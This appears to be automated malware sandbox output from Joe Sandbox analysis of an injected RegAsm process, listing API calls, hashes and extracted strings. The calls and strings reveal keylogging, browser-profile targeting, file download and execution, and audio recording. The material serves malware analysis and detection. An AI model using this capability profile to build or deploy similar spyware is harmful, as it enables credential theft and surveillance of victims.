                                                                                                                                                                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                                                                                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                                                                                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                          • String ID: image/png
                                                                                                                                                                                          • API String ID: 1291196975-2966254431
                                                                                                                                                                                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0041667B
                                                                                                                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DownloadFileSleep
                                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                                          • API String ID: 1931167962-604454484
                                                                                                                                                                                          • Opcode ID: 23c0d15862891f109a40fdddb4ae6ecff568236dd6bd086d00771120206df636
                                                                                                                                                                                          • Instruction ID: 5f2f4eaea06af766438de23c57bf7e18e051cc85399dca49d3ca0aebf2030ff8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 23c0d15862891f109a40fdddb4ae6ecff568236dd6bd086d00771120206df636
                                                                                                                                                                                          • Instruction Fuzzy Hash: 781100716083029AC614FF72D8969BE77A8AF90748F400C3FF546621E2EF3C9949865A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                          • API String ID: 481472006-2430845779
                                                                                                                                                                                          • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                                          • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: alarm.wav$hYG
                                                                                                                                                                                          • API String ID: 1174141254-2782910960
                                                                                                                                                                                          • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                                                                          • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                                                                                          • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                          • String ID: Online Keylogger Stopped
                                                                                                                                                                                          • API String ID: 1623830855-1496645233
                                                                                                                                                                                          • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                                                                                                          • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • waveInPrepareHeader.WINMM(012C09D0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                                                                                                                          • waveInAddBuffer.WINMM(012C09D0,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                          • String ID: XMG
                                                                                                                                                                                          • API String ID: 2315374483-813777761
                                                                                                                                                                                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                                                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                                                                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LocaleValid
                                                                                                                                                                                          • String ID: IsValidLocaleName$kKD
                                                                                                                                                                                          • API String ID: 1901932003-3269126172
                                                                                                                                                                                          • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                                                                                                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                                                                          • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                          • API String ID: 1174141254-4188645398
                                                                                                                                                                                          • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                                                                                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                                                                                          • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                          • API String ID: 1174141254-2800177040
                                                                                                                                                                                          • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                                                                                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                                          • API String ID: 1174141254-1629609700
                                                                                                                                                                                          • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                                                                                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                                                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                                                                                                                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                                                                                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                                                                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,0000005B,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                          • String ID: [AltL]$[AltR]
                                                                                                                                                                                          • API String ID: 2738857842-2658077756
                                                                                                                                                                                          • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                                          • String ID: !D@$open
                                                                                                                                                                                          • API String ID: 587946157-1586967515
                                                                                                                                                                                          • Opcode ID: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                                                                                                                                                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: State
                                                                                                                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                          • API String ID: 1649606143-2446555240
                                                                                                                                                                                          • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                                          • String ID: ,kG$0kG
                                                                                                                                                                                          • API String ID: 1881088180-2015055088
                                                                                                                                                                                          • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                                                                          • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                                          • API String ID: 1872346434-4028850238
                                                                                                                                                                                          • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                                                                          • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                                                                                                          • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                                                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4100373531-0
                                                                                                                                                                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99